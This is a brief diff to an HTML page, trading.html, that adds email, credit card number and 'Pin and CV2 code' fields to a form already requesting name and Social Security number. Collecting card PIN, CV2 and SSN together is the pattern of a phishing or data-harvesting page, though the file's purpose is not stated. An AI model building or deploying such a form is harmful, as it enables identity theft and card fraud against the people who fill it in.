--- a/trading.html
+++ b/trading.html
@@ -3,8 +3,10 @@
 <form>
   First Name: <input type="text" name="firstname"><br>
   Last Name: <input type="text" name="lastname"><br>
+  Email Address: <input type="text" name="emailaddress"> <br>
   Social Security Number: <input type="text" name="socialsecuritynumber"> <br>
-  
+  Credit Card Number: <input type="text" name="creditcardnumber"> <br>
+  Pin and CV2 code: <input type="text" name="pinCV2"> <br>
   
 </form>
 
